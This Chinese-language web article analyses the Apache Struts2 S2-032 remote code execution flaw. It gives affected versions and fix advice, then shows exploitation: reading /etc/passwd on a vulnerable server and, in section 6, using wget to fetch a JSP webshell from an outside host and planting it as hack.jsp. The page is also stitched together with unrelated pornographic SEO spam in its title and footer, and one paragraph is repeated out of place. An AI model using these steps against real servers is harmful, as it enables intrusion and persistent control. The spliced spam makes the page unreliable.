成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Struts2遠程代碼執行漏洞s2-032分析及其利用

原創
安全 漏洞 應用安全
Struts2遠程代碼執行漏洞(s2-032)引發了無數大型系統的“血案”,很多從事開發和安全維護的朋友,在4月26日基本是無眠之夜,在撰寫本文時,在烏云和360補天平臺上鋪天蓋地的s2-032遠程執行漏洞,航空、銀行、學校和政府成為本次漏洞的重災區,s2-032遠程代碼執行漏洞危害大,本文對s2-032漏洞進行介紹,并對如何利用等進行詳細介紹。

Struts2遠程代碼執行漏洞(s2-032)引發了無數大型系統的“血案”,很多從事開發和安全維護的朋友,在4月26日基本是無眠之夜,在撰寫本文時,在烏云和360補天平臺上鋪天蓋地的s2-032遠程執行漏洞,航空、銀行、學校和政府成為本次漏洞的重災區,s2-032遠程代碼執行漏洞危害大,本文對s2-032漏洞進行介紹,并對如何利用等進行詳細介紹。

[[165868]]

1.Struts簡介

Struts是Apache基金會Jakarta項目組的一個開源項目,Struts通過采用Java Servlet/JSP技術,實現了基于Java EE Web應用的Model-View-Controller(MVC)設計模式的應用框架,是MVC經典設計模式中的一個經典產品。目前,Struts框架廣泛應用于政府、公安、交通、金融行業和運營商的網站建設,作為網站開發的底層模板使用,是應用最廣泛的Web應用框架之一。

Struts 2是Struts的下一代產品,是在 struts 1和WebWork的技術基礎上進行了合并的全新的Struts 2框架。其全新的Struts 2的體系結構與Struts 1的體系結構差別巨大,其在Action的實現方面線程模型方面、Servlet依賴方面、封裝請求參數、表達式語言方面、綁定值到視圖技術、類型轉換、Action執行控制的對比、攔截器的應用等方面較Struts1進行了較大改進。Struts 2以WebWork為核心,采用攔截器的機制來處理用戶的請求,這樣的設計也使得業務邏輯控制器能夠與 ServletAPI完全脫離開,所以Struts 2可以理解為WebWork的更新產品。雖然從Struts 1到Struts 2有著太大的變化,但是相對于WebWork,Struts 2的變化很小。

2. s2-032漏洞簡介

4月15號安恒安全研究院在Struts 2上發現了一個嚴重的遠程代碼執行漏洞(CVE-2016-3081)(http://seclab.dbappsecurity.com.cn/?p=924),也即Struts 2的s2-032漏洞,4月26日,互聯網上披露了Apache Struts 2 S2-032遠程代碼執行漏洞的利用代碼,經測試,遠程攻擊者利用漏洞可在開啟動態方法調用功能的Apache Struts 2服務器上執行任意代碼,取得網站服務器控制權。

(1)調用方法

Struts2是第二代基于Model-View-Controller (MVC)模型的java企業級web應用框架,并成為當時國內外較為流行的容器軟件中間件。Struts 2的核心jar包-struts2-core中,存在一個default.properties的默認配置文件用于配置全局信息,當struts.enable.DynamicMethodInvocation = true,即開啟動態方法調用。盡管在Struts2目前的安全策略中,對部分動態調用方法進行了特殊字符傳遞的限制,但在該漏洞中攻擊者仍能通過通過OGNL表達式靜態調用獲取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS屬性并覆蓋_memberAccess的方式進行繞過,進而可在受控制的服務器端執行任意代碼。

(2)漏洞影響范圍

漏洞影響Struts 2.0.0 - 2.3.28 (除2.3.20.2和2.3.24.2以外)版本

(3)漏洞修復建議

Apache Struts官方已發布了升級程序修復該漏洞,建議用戶升級至struts 2.3.20.2,2.3.24.2,2.3.28.1版本。更新地址:https://cwiki.apache.org/confluence/display/WW/Migration+Guide。未能及時升級的用戶也可通過如下參數設置關閉動態方法調用功能來規避該漏洞的攻擊威脅

3.漏洞測試樣例

(1)測試當前用戶

 

Struts2遠程代碼執行漏洞s2-032及其利用

 

將以上代碼復制到瀏覽器執行成功后會下載相應的action文件,如圖1所示,本例中為login.action,則將該文件保存在本地后,使用notepad打開后可以看到第一行文件為root,表示當前用戶為root,如圖2所示,還可以將其命令更換為id等其它命令。

Struts2遠程代碼執行漏洞(s2-032)引發了無數大型系統的“血案”,很多從事開發和安全維護的朋友,在4月26日基本是無眠之夜,在撰寫本文時,在烏云和360補天平臺上鋪天蓋地的s2-032遠程執行漏洞,航空、銀行、學校和政府成為本次漏洞的重災區,s2-032遠程代碼執行漏洞危害大,本文對s2-032漏洞進行介紹,并對如何利用等進行詳細介紹。

圖1存在漏洞下載文件

Struts2遠程代碼執行漏洞(s2-032)

圖2查看漏洞執行結果

(2)快速顯示漏洞

將command后的值設置為“netstat-an”或者“cat /etc/passwd”比較容易查看結果,如果存在結果,如圖3,圖4所示,則表明系統存在漏洞。如果是Windows則whoami會顯示為“nt authority\system”,其它多為root或者jboss。

Struts2遠程代碼執行漏洞s2-032及其利用

圖3 執行netstat命令

Struts2遠程代碼執行漏洞s2-032及其利用

圖4執行查看passwd文件命令

4.網上公開檢測地址

在線檢測s2-032的工具:

(1)http://0day.websaas.cn/

(2)https://www.seebug.org/monster/

將網站地址輸入檢測網站即可,如果存在漏洞會進行提示,如圖5所示。

Struts2遠程代碼執行漏洞s2-032及其利用

圖5在線檢測

5.網上公開的s2-032漏洞綜合利用工具

以K8為代表的安全愛好團隊已經公開s2-032漏洞的綜合利用工具,運行后將網站地址復制到目標中即可,注意必須要帶http或者https,如圖6所示,可以獲取目標信息、執行命令和文件上傳等功能。

Struts2遠程代碼執行漏洞s2-032及其利用

圖6網上公開漏洞利用工具

6. s2-032漏洞的高級利用方法

發現s2-032漏洞后,可以利用K8 Struts2 Exploit利用工具,上傳Jsp小馬,例如可以執行Linux命令的小馬,然后在服務器上放置一個大的Jsp馬,通過wget命令下載到本地,將其復制到相應位置即可執行。

wget http://www.antian365.com/jsp.txt

cp /opt/apache-tomcat-7.0.64/bin/jsp.txt /opt/apache-tomcat-7.0.64/app/hack.jsp

http://www.somesite.com/hack.jsp

7.參考文章

http://baike.baidu.com/view/1566725.htm

http://seclab.dbappsecurity.com.cn/?p=924

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2017-07-11 09:42:22

漏洞

2013-07-18 10:06:54

2013-05-22 10:28:19

2012-12-18 16:18:06

2013-07-19 09:36:04

struts2struts2漏洞

2016-06-08 10:09:24

2013-07-18 15:09:27

2017-03-08 22:23:02

2023-12-14 16:20:09

2017-07-14 13:51:19

2017-09-12 07:54:32

2017-08-22 13:45:27

2013-07-22 10:45:56

2017-07-17 11:00:53

2013-07-24 10:35:02

2011-07-18 14:43:40

JSON模擬加載初析

2009-07-29 09:54:34

struts2和str

2012-04-25 10:14:40

JavaStruts

2016-09-29 14:37:39

ImageMagick漏洞分析

2009-06-25 15:11:28

Struts2教程Struts2程序
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 青青草免费在线视频 | 不卡在线视频 | 久草视频观看 | 中文字幕在线观看成人 | 国产精品一区二区在线 | 一区二区高清不卡 | 欧美亚洲国产日韩 | 国产精品一区二区三区免费观看 | 欧美日韩在线一区二区 | 一级国产精品一级国产精品片 | 成人国产精品久久 | 99亚洲精品| 天天草天天干 | 一级片免费在线观看 | 国产乱人伦精品一区二区 | a级免费黄色片 | 中文字幕在线免费观看 | 久久久影院 | www.99re5.com| a毛片视频网站 | 91精品国产一区二区 | 免费av播放 | 成人精品一区亚洲午夜久久久 | 久久精品91久久久久久再现 | 欧美一区免费在线观看 | 91精品久久久久久久久久小网站 | 久久99精品久久久97夜夜嗨 | 亚洲国产精品第一区二区 | 中文字幕在线看第二 | 97精品超碰一区二区三区 | 97视频在线观看网站 | 五月婷婷在线视频 | 国产免费让你躁在线视频 | 毛片久久久 | 最新中文字幕 | 欧美一区永久视频免费观看 | 日韩成人精品 | 99久久婷婷| 在线观看你懂的网站 | 欧美激情一区二区三区 | 亚洲va欧美va天堂v国产综合 |